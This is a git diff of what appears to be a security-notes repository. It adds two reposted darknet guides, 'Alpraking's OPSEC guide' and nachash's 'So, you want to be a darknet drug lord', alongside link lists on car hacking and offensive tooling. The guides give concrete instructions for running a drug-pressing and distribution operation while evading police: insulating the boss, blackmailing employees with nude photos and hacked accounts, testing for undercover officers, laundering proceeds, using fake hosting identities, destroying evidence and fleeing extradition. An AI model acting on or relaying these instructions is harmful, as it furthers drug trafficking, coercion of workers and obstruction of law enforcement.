@ -0,0 +1,12 @@ | |||
Completed Sections(Have gone through once, cleared most of cull) | |||
Sys internals |
@ -0,0 +1,62 @@ | |||
Alpraking's OPSEC guide to being a successful kingpin. | |||
submitted 5 hours ago * by AlpraKing | |||
For sale only $1999.97 unti..... | |||
pls UPVOTE cuz FREE. | |||
So you want to ship hundred of thousand of pills a week for years and stay safe? | |||
Here's a couple of tips to keep you safe. I've been here since SR 1.0 under various aliases and have, over the course of my-3 years online career , shipped over 10 million pills. I used to press pills myself. Now last time i've seen a press was a year ago. I'm basically just smoking bowls and trolling on reddit now. | |||
1. Outsource | |||
Outsourcing simply refers to the noble art of hiring other people, "pawns of the checker", to do the dirty work. You want to hire clean people that dont arise suspicions. They will be doing the dirty work so you want to hire someone who isn't already involved in drug trade or has priors. Don't get me wrong, you'll do everything in your power to protect them. Remember, if your guys catch heat, it can propagate to deeper layers fairly quickly and ultimately, to you. | |||
2. Separate Administration & Execution | |||
Have a layer of people who are doing the "boss" work and another one who is doing the "executive" work. Boss work is mainly paperwork and verifications to ensure everyone is doing his job properly and numbers balance and quality control is in check. Administrators dont get their hand dirty as that they will not handle the drugs themselves, but they will make sure packs are being shipped, tracking codes are being handled, productions are being made correctly and such. Administration is a promotion for executives who have shown a great degree of skill and loyalty. You can't put just anyone to overlook someone else's work. You have to get someone who has done it before and will be able to train new personnel or solve irregular issues. I normally promote my executors to administrators once they have shown that they can handle any issue from their business. I have them hire one of their friend and pay both from my own pocket. Employees kind of like hearing "hey, how about you keep your salary, train your friend to do your job, and you both will earn the same thing, paid from the big boss' pocket." More than money, people want power. Give power to people who want power and keep the money for yourself. | |||
3. Treat your employees well but do NOT overpay them. | |||
Treat your employees well by giving them insurances, paid vacations & trips, surprises bonuses, gifts and such. Do NOT give them a large payout even if they're pressing or shipping hundreds of thousands of pills. If someone becomes too comfortable with his pay, his quality of work will lower. you have to keep your employees dependant on you. Overpaying employees = Bad work. Double loss. For example in my own company all employees have a health insurance. they are allowed up to 1500/month in private medical, psychological bills paid by my expense) If not used, it will be given as a bonus vacation trip every couple months. Any lawyer time they might need for questions is also paid by the company. | |||
4. Don't hire people under 30 years old | |||
Both in the administrative and executive field. People under 30 years old are reckless, like to hang out in bars and brag to friends. People over 30 years old (get 40,50+ if you can) tend to be more straight with their shit. Much less likely to steal or botch the work and normally know the value of money. If you can get someone 40 yo+ that doesn't have a record, its most likely someone who already had a full-time job and knows how to work decently and not do dirty shit. Im 20 btw. | |||
5. Inform your people | |||
Tell them the truth. what they're risking, what to expect, have them meet your own loyal people who already been arrested for you and have them testify about the backup they had for not snitching. People will be much less likely to switch on you if you've told them exactly the truth. Don't go around with "There's no risk!" bullshit. Not only will your guys not believe you but they'll totally go nuts when they get arrested if you do. | |||
6. Back your own people | |||
Make sure all of your people are properly lawyered up. have them know by heart the name and phone number of their designated lawyer (under your control) and have them meet regularly, all expenses paid by you, in order to strengthen this trust between the lawyer and the employee. | |||
7. Don't hire people yourself | |||
People close to you, that you love and value, should not be getting their hands dirty on the long run. have them quit, or promote them quickly, if you have them on the field. As soon as they've mastered their work, have them hire their own friend to do your work, and pay both. | |||
8. Rotate your employees between jobs | |||
By rotating your employees between various work in your company you not only prevent heat from accumulating on one particular place or person, confusing investigations, but you're also contributing to their general training. this has various positive consequences; You are able to better target the quality and flaws of your various employees by having them try numerous different things. Also, if a branch of the operation is arrested, you can quickly reach out to your other personnel who has done similar work in the past to fill the voids. | |||
9. Have separate different secret workspots, and different labs. | |||
In order to confuse investigations, its mandatory to have different personnel, workspots, and labs. If i feel that heat is growing on one lab, I can quickly clean it up, have the worker stop and lay low for a while, and i simply transfer the workload over another less-heated up lab and production-guy. Its very difficult to see all the connections amongst various people especially when dealing with over 30 employees, but its needed. These connections are what will carry heat. I tend to think of it a bit like a computer would: | |||
10. Get it down to numbers. (TLDRs; skip this part) | |||
its hard to explain this part with words so I'll give an example with numbers. | |||
You suspect your packs are being profiled. If there is profiling going on, your courier is going to be considered the starting point of the heat. We will give it a 80% heat rating for this very event. Considering the courier access 3 times a week a stash, you will give the stash a 50% heat rating, just from this very link. the stash himself is linked to the lab, but only access it onces every 2 weeks. you will give your lab a 15% heat rating from this very event. Your treshold of risk is 70% (meaning you will shut down someone/somewhere that has over 70% heat rating), at this point you will shut down the courier and have him lay low, but the heat is not yet sufficient to close the stash and the lab, at 50% and 15% respectively | |||
Now a few days later you see a cop car parked on the street of your lab. This very event is worth 50% heat on your lab, and will also drip a 20% heat on your stash and 5% on your courier due to the links. | |||
Now shit got hot. Everything is above 70%. closing the entire branch. | |||
You'll admit it doesn't take math to notice that if your packs are being profiled AND a cop car is seen near your lab, you must be pretty hot as a whole and you SHOULD shut down. All I did was add numbers to follow the flow of heat and decide wisely what is hot and what is not. My objective is to keep all places around 30-40% heat which i consider a stable zone. If 60-70% is reached im going to start investigating very closely, but I will not close it down. If it busts 80% then its being closed down and laid low for a few weeks. Its not accurate because you have to estimate everything with little to no information, but it definitely helps seeing things and calculate your moves. If an event bust 150%, i will completely dismantle the place and move it to another spot. | |||
11. Trust buffers. | |||
Always have a layer of administration between you and your executives. You don't hire any executives, have your administrators do it. By doing so, NO ONE at risk of being busted knows who you are, let alone that you exist. If employees get caught and want to snitch, all they'll snitch is your administrator, who you should have sufficient trust in to believe he wont snitch you also. | |||
12. Family links between employees are powerful. | |||
If you testify in court, you don't get to choose who you snitch and who you don't (In Canada at least). You snitch everything or nothing. So it helps if employees get caught with members of their families, because they are much less likely to snitch as it would involve having them snitch on their own family. You can also use the trust between members of a single family to your advantage. You can normally trust your employee's brother or sister pretty much the same as you can trust your employee. assuming both work for you. | |||
13. Control the money | |||
Do not reveal how much you're making or how much people are making relative to one another. Its none of their business. I normally fund in cash one of my administrators with a lot of cash and he pays everyone by sending them cash in the mail, or bitcoins. He makes comptability records and bring them to me so i can see where the money went, before I handle more cash/btc to him. | |||
14. Encrypt everything | |||
Have your employees familiar with tails & tor+pgp communications. Anyone minially professional will take some notes. Make sure all your employees from the top to the bottom is familiar with TAILS and has a secure passphrase. Have them place all their documentation and notes there. Any paper hanging around must be burned. | |||
15. Avoid keeping illegal shit around the "dangerous hours". | |||
I refer to "Dangerous hours" as week-days 5AM to 8AM. My experience has shown me 90% of large drug raids occur during this time period. | |||
16. Not everyone has to know everyone. | |||
Its everyone's dream to think its like the movies where we gangsta organise "cartel parties" where everyone is invited. It doesn't work that way. If someone doesn't have to meet someone, don't make them meet. Don't take the risk of adding up more "heat rating" by creating un-necessary links between individuals who are not directly connected. | |||
17. Keep "jokers" | |||
Jokers are last-resort cards that allow you to solve dangerous issues or take-over control of your business in the event of catastrophic problems. Pictures of your employees naked, hacked passwords to their facebooks, knowing their addresses, etc. Anything you can use against them if shit goes wrong helps. | |||
18. Be diplomat when kicking people out | |||
Always be very diplomat when kicking people out. Give them a nice fat good-bye paycheck and specify you're giving them this paycheck to "forget everything". Keep good terms and explain your decisions with opsec and that you're doing this for their own protection. | |||
19. If your company screw up, pickup the pieces, dont flee. | |||
Believe me, its worth more in the long run if you admit to being busted/admit to problems, refund everyone, close shop for a few months, and come back, than it is to exit scam and start under a new name. It builds confidence in the long run. Its easy to be honest when your business goes well. But its in the bad moments that you show your true face. If you've been fucked in the past, been honest with everyone then came back, it gives an assurance that the same will happen if there's a fuckup in the future. How many vendors look so perfect until they start having issues? and when they do, most will run with customers money. If you are honest with customers despite problems, it will reward you later. It also helps looking at yourself in the mirror in the morning knowing you haven't fucked over a ton of people with less wealth than you. | |||
20. Always change | |||
Always change lab locations, stealth, rotate employees, open and closes front or laundering shops. Have several at the same time so you can switch work between places. Its like playing whack a mole with LE. If you stay too long in one single place, you'll get caught. I do not believe in "megalabs" with super OPSEC that are stable for years. A decentralised network of several small labs & dispatch places, constantly changing places, is the best. Its even better when you can afford to change places AND employee at the same time. Literally drops heat rating to 0% | |||
21. Make sure your team's opsec is always on point. | |||
Meet regularly with your administrators and have them tell you all the problems. Never get angry and don't judge them. They'll be much more open if they do not fear your reaction. Everyone can make mistakes. Your administrators should have the same attitude toward their employees. A transparent company allows you to see more problems and react accordingly. | |||
22. Don't flash | |||
Don't. Just don't. Fuck nice cars & nice houses as long as you are on the field or know directly people who work on the field. That will get you heated up more than anything else. Pile your money, hide it and work on laundering it with as much care and opsec as you do with your drugs. Fuel it in a legitimate business, with customers, then start laundering it slowly. Remember, as long as your money isn't properly laundered, its virtual. Anything you buy with it is a cursed gift that will increase your own heat and can also potentially be seized by LE. You can start flashing when all your work has been securely outsourced or when you retire. | |||
23. Dont get high on your own supply | |||
You should actually never even have your own supply in your house or somewhere that could be linked to you. It also impairs your judgement and can worsen paranoia, narcissism and other personality problems you tend to develop being in the drug business. Especially Xanax. Dont take Xanax and take important decisions; you will regret it. | |||
24. Prepare for an arrest | |||
Prepare yourself, psychologically and with your lawyer, your family, your administrators, in the event of a bust. Make sure you have cash readily accessible by your trusted people and have a plan. You won't be able to interact much with the outside world starting the very moment your door is rammed. And you won't be told when it would happen. Run "simulations" of a scenario where you and several of your administrators are arrested. Make sure someone can take your place or at least handle your personnal stuff, and get yourself a lawyer early on the payroll. Everytime you go to sleep in your bed, it might be the last night you get to pass there for a couple years. And everytime you peacefully wake up in the morning, congrats yourself that you have survived yet another day. | |||
The end | |||
Well not really, I wrote that nonstop just spewing out ideas. I think I could continue until 100. but my coke binge is over and i'm growing tired of writing. Good luck with your high-volume ambition, plebs. >:) | |||
TL;DR: https://anony.ws/image/JYCI | |||
P.S. Whoever is pressing fentanyl in xanax bars; Stop. Please. You're attracting LE attention on my game and making me lose sales due to everyone freaking the fuck out in the streets. And you're killing people. It's wrong. |
@ -0,0 +1,329 @@ | |||
So, you want to be a darknet drug lord... | |||
by nachash | |||
nachash@observers.net | |||
[The advice in this article can be adapted to suit the needs of other | |||
hidden services, including ones which are legal in your jurisdiction. | |||
The threat model in mind is that of a drug market. The tone is that of a | |||
grandfather who is always annoyingly right, who can't help but give a | |||
stream-of-consciousness schooling to some whippersnapper about the way | |||
the world works. If this article inspires you to go on a crime spree and | |||
you get caught, don't come crying to me about it.] | |||
You've decided that you're bored with your cookie-cutter life of working | |||
at a no-name startup, getting paid in stock options and empty promises. | |||
You want a taste of the good life. Good for you, kid. I used to run a | |||
fairly popular hidden service (DOXBIN) that was seized by the FBI after | |||
3 1/2 years of spreading continuous butthurt, then subsequently | |||
repossessed from the feds. Because I managed to not get raided, I'm one | |||
of the few qualified to instruct others on hidden services and security, | |||
simply because I have more real-world experience operating hidden | |||
services than the average tor user. In other words, very little of this | |||
advice is of the armchair variety, as you'll often find in abundance the | |||
Internet. But enough about me. Let's talk about your future as an | |||
internet drug lord. | |||
1. Legal/Political | |||
First things first, you need to cover the legal, historical and | |||
political angles. Read up on various drug kingpins and cartels from the | |||
20th century. Learn everything you can about how they rose and fell ( | |||
you can safety ignore all the parts about intelligence agencies backing | |||
one drug cartel over another, because that's not going to happen to | |||
you). Once you've got a good command of that, read everything you can | |||
about busted drug market operators and branch out into cybercrime | |||
investigations as well. It wouldn't hurt to make yourself familiar with | |||
law enforcement and intelligence agency tactics either. You'll find that | |||
virtually all drug kingpins either get murdered or go to prison. Let | |||
those lessons sink in, then find a good drug lawyer and make plans for | |||
being able to pay them when The Man seizes everything you own. While | |||
you're dreaming big about making fat stacks of fake internet money, do | |||
some research on Mutual Legal Assistance Treaties and extradition treaties. | |||
Mutual Legal Assistance Treaties (MLATs) are self-explanatory. Country A | |||
will help Country B do whatever it takes to aid a cybercrime | |||
investigation should some aspect of the crime bleed over into Country A. | |||
Figure out which countries don't provide legal assistance to your | |||
country in these cases, then find hosting services that are based there. | |||
You'll shorten this list by determining which hosts allow tor, or at | |||
least don't explicitly forbid it in their Terms of Service (you don't | |||
care about exit bandwidth. You just want relays. Remember this for later | |||
in the article). Last but not least, sort out which hosts accept payment | |||
options that don't make you sweat bullets over the fact that the NSA has | |||
been monitoring global financial transactions since at least the 1970s. | |||
You will want to avoid any host that advertises itself as bulletproof -- | |||
they'll probably kit your box and siphon everything of value, in | |||
addition to overcharging you for the privilege of running on older | |||
hardware -- and any host which sells a cheap VPS and promises to | |||
guarantee your privacy. | |||
Extradition treaties mean that if you're in Country A and do something | |||
that makes Country B want to prosecute you, Country A is most likely | |||
going to give you a one way ticket to Country B. If or when your box | |||
gets seized and you know the heat is on, you're going to want to beat it | |||
to a place that won't send you back, where you will presumably live out | |||
the rest of your days. Just make sure you've made enough money to grease | |||
all the right palms in your new life, or the road ahead may be extremely | |||
bumpy. If you're smart, you'll permanently move to this country well | |||
before you have any trouble with law enforcement. | |||
One last thing before moving on: Don't be so stupid as to attempt to | |||
hire a hitman to kill anyone. Murder-related charges have no statute of | |||
limitations, which means you won't get to write a tell-all book about | |||
what a sly bastard you are when this wild ride is a distant memory. If | |||
you've reached a point in your new career where murdering people makes | |||
sense, it's time to walk away. Don't get corrupted like Dread Pirate | |||
Roberts. | |||
2. Technical | |||
This section tries to be as operating system independent as possible. | |||
You'll want to consult the documentation of your OS for specifics. The | |||
technical side of running a hidden service and not getting owned by cops | |||
is a lot harder than just installing stuff and crossing your fingers. | |||
The recommendations in this section WILL NOT protect you from 0days in | |||
the wild, but should help somewhat with damage control. Remember, if | |||
they want to own your hidden service, it will probably happen eventually. | |||
Before you even think about installing bitwasp and tor, you need to | |||
really understand how tor works. Go to freehaven.net and read the white | |||
papers until your eyes glaze over, then continue reading until you're | |||
out of papers to read. Pay particular attention to the hidden service | |||
papers. If you feel like you didn't understand something, come back to | |||
that paper again when you have more knowledge. A lot of the papers | |||
explain some of the same concepts with slight differences in the intros. | |||
Don't skim over them, because you might read someone's rewording that | |||
will clarify an idea for you. Check back with freehaven regularly. Once | |||
you're up to speed, a good next step is to keep up with the tor | |||
project's mailing lists. [1] | |||
While you're doing all of this reading, it's (mostly) safe to go ahead | |||
and install tor on a box on your local network, purely for | |||
experimentation. Keep in mind that the NSA will start scooping up all of | |||
your packets simply because you visited torproject.org. That means don't | |||
post code questions related your drug market on Stack Exchange, if you | |||
want to avoid giving The Man morsels he can use for parallel | |||
construction. Once you've gotten hidden services working for http and | |||
ssh, you're going to take the first baby step towards evading casual | |||
discovery: Bind your hidden services to localhost and restart them. | |||
The next step in your journey towards changing the drug business forever | |||
is to grab the transparent proxying firewall rules for your operating | |||
system to make sure they work. [2] They will guard against attacks that | |||
cause your box to send packets to a box the attacker controls, which is | |||
useful in thwarting attempts to get the box IP. You may wish to have a | |||
setup similar to an anonymous middle box, preferably without public IPs | |||
where possible, so if your application gets rooted tor isn't affected. | |||
Speaking of applications, do everything you can to ensure that the | |||
application code you use to power your hidden service isn't made of | |||
Swiss cheese and used bandaids. To protect against other types of | |||
attacks, you will want to identify any pre-compiled software that your | |||
users will touch and compile it yourself with hardening-wrapper or it's | |||
equivalent, plus any custom flags you want to use. If you keep | |||
vulnerabilities from the application and server to a minimum, your | |||
biggest worries will be tor-related. | |||
You will only connect to your production box via a hidden service. It's | |||
a good idea to get into that habit early. The only time deviating from | |||
this pattern is acceptable is when you have to upgrade tor, at which | |||
time you'll want to have a script ready that drops your firewall rules | |||
and unbinds ssh from localhost just long enough for you to login, do the | |||
upgrade, re-apply the firewall rules and bind ssh to localhost again. If | |||
you're not ready to deal with the latency, you're not ready to do any of | |||
this. Don't forget to transparently proxy the machine you use too, so | |||
you don't slip up by mistake. | |||
On the subject of the machine, you need to automate the process of both | |||
setting up your hidden service and of destroying it. Proactively change | |||
servers every few months, in order to frustrate law enforcement attempts | |||
to locate and seize your site. Your creation script should install | |||
everything your site needs as well as all configuration files. Your | |||
clean-up script needs to destroy all evidence, preferably with a tool | |||
like srm. | |||
Regarding time-related issues: Always select either UTC or a time zone | |||
that doesn't match the box's location. You will also do this to the box | |||
you use to interact with your hidden service every day. If you read the | |||
whitepapers, you will probably note a recurring theme of clock | |||
skew-related attacks, mostly directed at clients, in some of the older | |||
papers. Tor won't even start if the clock skew is off by too much. | |||
If you want to have some fun at the expense of business in the short | |||
term, intentionally take your service offline periodically in order to | |||
mess up attempts to match your downtime with public information. If | |||
you're the kind of person with access to botnets, you could DDoS | |||
(Distributed Denial of Service) some provider at the same time on the | |||
off chance that someone might connect the dots. This counter-measure | |||
will only work on researchers looking at public info, not nation state | |||
actors with an ax to grind. | |||
I've saved some of the hardest stuff for the last part of this section. | |||
It's hard because you have to make choices and it's unclear which of | |||
those choices are the best. It's a bit like a Choose Your Own Adventure | |||
book. In that spirit, all I can do is lay out the possibilities in as | |||
much of a Herodotus-like way as possible. | |||
One thing you have to consider is whether you want to run your hidden | |||
service as a relay or not. If it's a relay, you'll have extra cover | |||
traffic from other innocent tor users. But if your relay goes down at | |||
the same time as your hidden service, it will be far more likely to be | |||
noticed. Federal criminal complaints make a big deal of seized hidden | |||
services not being relays, but three relays were taken down at around | |||
the same time as Operation Onymous, so that's not a guaranteed defense. | |||
The choice is yours. | |||
Remember when I said to take note of hosts that don't ban tor outright? | |||
This is the part where you give back to the community in the form of tor | |||
relays or bridges. [3] The feel-good aspects of this move are along the | |||
same lines as drug barons who build schools and hospitals, but this is | |||
more immediately self-serving. You're going buy several servers to set | |||
up strictly as relays or bridges, then configure your hidden service box | |||
to use only those relays or bridges to enter the tor network. Here's | |||
where things start to get theoretical. | |||
If an adversary is running a guard node discovery attack -- in which an | |||
attacker is able to determine the node you're using to enter the tor | |||
network -- against your service and you're using your own relays as | |||
entry nodes, the damage they can do will be limited to DoS (Denial of | |||
Service) if your relays are not linkable to your identity. However, if | |||
you're entering the tor network with bridge nodes, an attacker will | |||
probably say "WTF?" at first unless they determine they've found a | |||
bridge node. Bridge nodes don't use nearly as much bandwidth as relays | |||
because there is not a public list of them, so an intelligence agency | |||
would have less traffic to sift through, which makes correlation easier. | |||
On the other hand, using bridge nodes also allows you to run obfsproxy | |||
[4] on both the bridges and your hidden service. obfsproxy allows you to | |||
make tor traffic appear to be another type of traffic, which is a good | |||
defense against non-Five Eyes entities. For example, your hosting | |||
provider may decide to monitor for tor traffic for their own reasons. | |||
Just make sure your relays/bridges aren't linkable to you or to each other. | |||
One last thing about guard node discovery attacks: The Naval Research | |||
Lab published a paper in July 2014 about the "Sniper Attack," [5] which | |||
in short works like this: The attacker discovers your guard nodes, then | |||
uses an amplified DoS trick to exhaust the memory on all of your nodes. | |||
The attacker keeps doing this until your hidden service uses guard nodes | |||
that they control. Then it's game over. If your hidden service's entry | |||
nodes are all specified in your torrc file and they get DoSed, your | |||
service will go offline. In this situation, if all of your relays are | |||
down, you essentially have an early warning canary that you're being | |||
targeted. In other words: This is the best possible time to book your | |||
one-way ticket to your chosen non-extradition country. For those of you | |||
with a background in writing exploits, this is similar in principle to | |||
how stack smashing protection will render some exploits either unable to | |||
function or will turn them into a DoS. Personally, I recommend an | |||
ever-changing list of relays or bridges. Add a few new ones at a | |||
pre-determined interval, and gradually let old ones go unpaid. | |||
3. Operational Security | |||
This section is critical, especially when things start to break down. If | |||
everything else goes bad, following this section closely or not could be | |||
the difference between freedom and imprisonment. | |||
This is important enough to re-state: Transparently proxy your tor | |||
computer. This is a good first line of defense, but it is far from the | |||
only way to protect yourself. | |||
Do not contaminate your regular identity with your Onion Land identity. | |||
You're an aspiring drug kingpin. Go out and pay cash for another | |||
computer. It doesn't have to be the best or most expensive, but it needs | |||
to be able to run Linux. For additional safety, don't lord over your new | |||
onion empire from your mother's basement, or any location normally | |||
associated with you. Leave your phone behind when you head out to manage | |||
your enterprise so you aren't tracked by cell towers. Last but not least | |||
for this paragraph, don't talk about the same subjects across identities | |||
and take counter-measures to alter your writing style. | |||
Don't log any communications, ever. If you get busted and have logs of | |||
conversations, the feds will use them to bust other people. Logs are for | |||
undercover cops and informants, and have no legitimate use for someone | |||
in your position. Keep it in your head or don't keep it at all. | |||
At some point, your enterprise is going to have to take on employees. | |||
Pulling a DPR move and demanding to see ID from high-volume sellers and | |||
employees will just make most people think you're a fed, which will | |||
leave your potential hiring pool full of dumbasses who haven't even | |||
tried to think any of this out. It will also make it easier for the feds | |||
to arrest your employees after they get done arresting you. If your | |||
enterprise is criminal in nature -- whether you're selling illegal goods | |||
and services or you're in a repressive country that likes to re-educate | |||
and/or kill dissidents -- an excellent way of flushing out cops is to | |||
force them to get their hands not just dirty, but filthy, as quickly as | |||
possible. Don't give them time to get authorization to commit a crime | |||
spree. If there's a significant amount of time between when they're | |||
given crimes to commit and the commission of those crimes, you need to | |||
assume you've got an undercover cop on your hands and disengage. If they | |||
commit the crime(s) more or less instantly, you should be fine unless | |||
you've got the next Master Splynter on your trail. [6] | |||
Disinformation is critical to your continued freedom. Give barium meat | |||
tests to your contacts liberally. [7] It doesn't matter if they realize | |||
they're being tested. Make sure that if you're caught making small talk, | |||
you inject false details about yourself and your life. You don't want to | |||
be like Ernest Lehmitz, a German spy during World War II who sent | |||
otherwise boring letters about himself containing hidden writing about | |||
ship movements. He got caught because the non-secret portion of his | |||
letters gave up various minor personal details the FBI correlated and | |||
used to find him after intercepting just 12 letters. Spreading | |||
disinformation about yourself takes time, but after a while the tapestry | |||
of deceptions will practically weave itself. | |||
Ensure that your communications and data are encrypted in transit and at | |||
rest whenever applicable. This means PGP for e-mail and OTR for instant | |||
messaging conversations. If you have to give data to someone, encrypt it | |||
first. For the tor-only box you use for interacting with your hidden | |||
service, full disk encryption is required. Make a password that's as | |||
long and complex as you can remember ("chippy1337" is not an example of | |||
a good password). Last but not least, when you're done using your | |||
dedicated tor computer, boot into memtest86+. Memtest86+ is a tool for | |||
checking RAM for errors, but in order to do that it has to write into | |||
each address. Doing so essentially erases the contents of the RAM. | |||
Turning your computer off isn't good enough. [8] If you're planning to | |||
use TAILS, it will scrub the RAM for you automatically when you shut | |||
down. Once your RAM is clean, remove the power cord and any batteries if | |||
you're feeling extra paranoid. The chips will eventually lose any | |||
information that is still stored in them, which includes your key. The | |||
feds can do a pre-dawn raid if they want, but if you follow this step | |||
and refuse to disclose your password, you'll make James Comey cry like a | |||
small child. | |||
Use fake info when signing up for hosting services. Obfuscate the money | |||
trail as much as possible and supply fake billing info. I prefer | |||
registering as criminals who are on the run, high government officials, | |||
or people I dislike. If your box gets seized and your hosting company | |||
coughs up the info, or if a hacking group steals your provider's | |||
customer database (It happens more often than you'd think), your hosting | |||
information needs to lead to a dead end. All signs in Operation Onymous | |||
point to operators being IDed because they used real info to register | |||
for hosting service and then their box got decloaked. | |||
Speaking of money, you're going to have to figure out how to launder | |||
your newfound assets, and we're not talking about using a couple bitcoin | |||
laundering services and calling it a day. You also shouldn't go out and | |||
buy a Tesla. Living beyond your means is a key red flag that triggers | |||
financial and fraud investigations. Remember, money is just another | |||
attack vector. Washing ill-gotten gains is a time-honored drug business | |||
tradition and one that you would be a fool not to engage in. You can | |||
only use your hard-won profits to send shitexpress.com packages to | |||
people you don't like so many times. | |||
Take-away: If you rely only on tor to protect yourself, you're going to | |||
get owned and people like me are going to laugh at you. Remember that | |||
someone out there is always watching, and know when to walk away. Do try | |||
to stay safe while breaking the law. In the words of Sam Spade, "Success | |||
to crime!" | |||
Sources: | |||
[1] https://lists.torproject.org/cgi-bin/mailman/listinfo | |||
[2] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy | |||
[3] https://www.torproject.org/docs/bridges | |||
[4] https://www.torproject.org/projects/obfsproxy.html.en | |||
[5] | |||
http://www.nrl.navy.mil/itd/chacs/biblio/sniper-attack-anonymously-deanonymizing-and-disabling-tor-network | |||
[6] http://www.pcworld.com/article/158005/article.html | |||
[7] https://en.wikipedia.org/w/index.php?title=Canary_trap&oldid=624932671 | |||
[8] https://freedom-to-tinker.com/blog/felten/new-research-result-cold-boot-attacks-disk-encryption/ |
@ -0,0 +1,22 @@ | |||
#Car Hacking | |||
http://dn5.ljuska.org/cyber-attacks-on-vehicles-2.html | |||
https://github.com/manux81/canspy | |||
[Introduction to Hacking in Car Systems - Craig Smith - Troopers15](https://www.youtube.com/watch?v=WHDkf6kpE58) | |||
http://illmatics.com/Remote%20Car%20Hacking.pdf | |||
Yet Another Car Hacking Tool](https://asintsov.blogspot.ro/2016/03/yet-another-car-hacking-tool.html?m=1) | |||
[CANToolz](https://github.com/eik00d/CANToolz) | |||
* CANToolz is a framework for analysing CAN networks and devices. This tool based on different modules which can be assembled in pipe together and can be used by security researchers and automotive/OEM security testers for black-box analysis and etc. You can use this software for ECU discovery, MITM testing, fuzzing, bruteforcing, scanning or R&D testing and validation | |||
https://canb.us/ |
@ -1,10 +0,0 @@ | |||
#Car Hacking | |||
[Introduction to Hacking in Car Systems - Craig Smith - Troopers15](https://www.youtube.com/watch?v=WHDkf6kpE58) |
@ -1,9 +0,0 @@ | |||
https://sysforensics.org/2014/01/know-your-windows-processes.html | |||
[Mitigating Pass-the-Hash Attacks and other credential Theft-version2](http://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating-Pass-the-Hash-Attacks-and-Other-Credential-Theft-Version-2.pdf) | |||
* Official MS paper. | |||
[Preventing the Exploitation of Structured Exception Handler (SEH) Overwrites with SEHOP](http://blogs.technet.com/b/srd/archive/2009/02/02/preventing-the-exploitation-of-seh-overwrites-with-sehop.aspx) |
@ -1,289 +0,0 @@ | |||
Shellsploit let's you generate customized shellcodes, backdoors, injectors for various operating system. And let's you obfuscation every byte via encoders | |||
http://jakob.engbloms.se/archives/1554 | |||
https://conversations.im/omemo/ | |||
http://nsarchive.gwu.edu/cybervault/ | |||
Urge Everyone to watch: | |||
Hamming - You and your research | |||
https://www.youtube.com/watch?v=a1zDuOPkMSw | |||
https://www.sysmocom.de/news/sysmocom-publicly-releases-osmocom-user-manuals/ | |||
http://www.wxhexeditor.org/home.php | |||
https://www.fishnetsecurity.com/6labs/blog/post-exploitation-using-netntlm-downgrade-attacks | |||
http://wiki.osdev.org/Stack_Smashing_Protector | |||
http://mig.mozilla.org/ | |||
https://github.com/google/sanitizers | |||
Computer SCience from the Bottom Up | http://www.bottomupcs.com/ | |||
https://github.com/elceef/dnstwist | |||
https://github.com/strazzere/anti-emulator/blob/master/slides/Dex%20Education%20201%20-%20Anti-Emulation.pdf | |||
https://warroom.securestate.com/bmp-x86-polyglot/ | |||
https://github.com/httphacker/gethead/blob/gh-pages/gethead.py | |||
USBPcap | |||
http://www.scribd.com/doc/47334072/How-to-Steal-a-Nuclear-Warhead-Without-Voiding-Your-XBox-Warranty-paper | |||
https://github.com/strazzere/IDAnt-wanna | |||
https://github.com/codewatchorg/SideStep | |||
https://github.com/stamparm/maltrail | |||
Blogpost explaining above | |||
http://blog.rewolf.pl/blog/?p=573 | |||
http://illmatics.com/Remote%20Car%20Hacking.pdf | |||
http://toshellandback.com/2015/11/24/ms-priv-esc/ | |||
https://github.com/securestate/king-phisher | |||
https://github.com/SecurityInnovation/AuthMatrix | |||
https://fosdem.org/2016/schedule/event/radar/ | |||
https://getgophish.com/documentation/ | |||
http://www.programminghorizon.com/win32assembly/ | |||
http://x86asm.net/articles/introduction-to-uefi/ | |||
Linux kernel development | |||
https://github.com/0xAX/linux-insides/blob/master/Misc/contribute.md | |||
http://noxxi.de/research/http-evader-explained-6-whitespace.html | |||
http://meyerweb.com/eric/comment/chech.html | |||
| **Security | |||
www.cs.wm.edu/~hnw/paper/tdsc12b.pdf | |||
http://www.pentest.guru/index.php/2015/10/19/ditch-psexec-spraywmi-is-here/ | |||
blogs.technet.com/b/markrussinovich/archive/2005/08/17/unkillable-processes.aspx | |||
https://github.com/google/honggfuzz | |||
http://faydoc.tripod.com/cpu/index_a.htm | |||
http://fabiensanglard.net/reverse_engineering_strike_commander/index.php | |||
| **ClearImage Free Online Barcode Reader / Decoder** | http://online-barcode-reader.inliteresearch.com/ | |||
http://blog.sematext.com/2015/10/05/recipe-apache-logs-rsyslog-parsing-elasticsearch/ | |||
https://programmers.stackexchange.com/questions/7652/identifying-programming-languages-by-a-piece-of-code | |||
http://blogs.technet.com/b/markrussinovich/archive/2005/08/17/unkillable-processes.aspx | |||
https://github.com/iv-wrt/iv-wrt | |||
https://github.com/danielmiessler/SecLists | |||
http://sector876.blogspot.com/2013/03/backdooring-pe-files-part-1.html | |||
http://sector876.blogspot.com/2013/03/backdooring-pe-files-part-2.html | |||
Good source for internals section: http://blogs.technet.com/b/markrussinovich/archive/2008/11/17/3155406.aspx | |||
http://www.securitytracker.com/id/1032048 | |||
https://reverse.put.as/2015/05/29/the-empire-strikes-back-apple-how-your-mac-firmware-security-is-completely-broken/ | |||
https://trmm.net/SPI | |||
Defeating Sniffers and Intrustion Detection Systems - Horizon, 12/25/1998 | |||
Armouring the ELF: Binary Encryption on the UNIX Platform - grugq, scut, 12/28/2001 | |||
Runtime Process Infection - anonymous, 07/28/2002 | |||
Polymorphic Shellcode Engine Using Spectrum Analysis - theo detristan et al, 08/13/2003 | |||
Next-generation Runtime Binary Encryption using On-demand Function Extraction - Zeljko Vrba, 08/01/2005 | |||
Stealth Hooking: Another Way to Subvert the Windows Kernel - mxatone, ivanlef0u, 04/11/2008 | |||
Mystifying the Debugger for Ultimate Stealthness - halfdead, 04/11/2008 | |||
Binary Mangling with Radare - pancake, 06/11/2009 | |||
http://pr+ojectshellcode.com/?q=node/12 | |||
http://fileformats.archiveteam.org/wiki/Encyclopedia_of_Graphics_File_Formats | |||
[](https://github.com/rrbranco/Troopers2015) | |||
[pwndbg - Making debugging suck less](https://github.com/zachriggle/pwndbg) | |||
* A PEDA replacement. In the spirit of our good friend windbg, pwndbg is pronounced pwnd-bag. | |||
* Uses capstone as backend. | |||
********* | |||
IPv6 | |||
IPv6: Basic Attacks and Defences - Christopher Werny[TROOPERS15] | |||
* [Part 1](https://www.youtube.com/watch?v=Y8kjQEGHbAU) | |||
